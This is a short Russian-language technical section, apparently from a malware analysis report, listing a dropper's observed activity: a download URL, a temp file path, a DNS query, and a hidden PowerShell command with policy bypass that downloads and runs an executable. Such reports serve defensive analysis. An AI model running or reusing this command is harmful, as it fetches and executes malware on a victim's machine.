Техническая информация
- http://dryversdocumentsandcustomer.com/ad0v3upd4t352017s.exe как %temp%\\tmperiputtyx86.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://dryversdocumentsandcustomer.com/Ad0v3upd4t352017s.exe','%TEMP%\\Tmperiputtyx86.exe') & %TEMP%\...
- DNS ASK dr#########mentsandcustomer.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://dryversdocumentsandcustomer.com/Ad0v3upd4t352017s.exe','%TEMP%\\Tmperiputtyx86.exe') & %TEMP%\...' (со скрытым окном)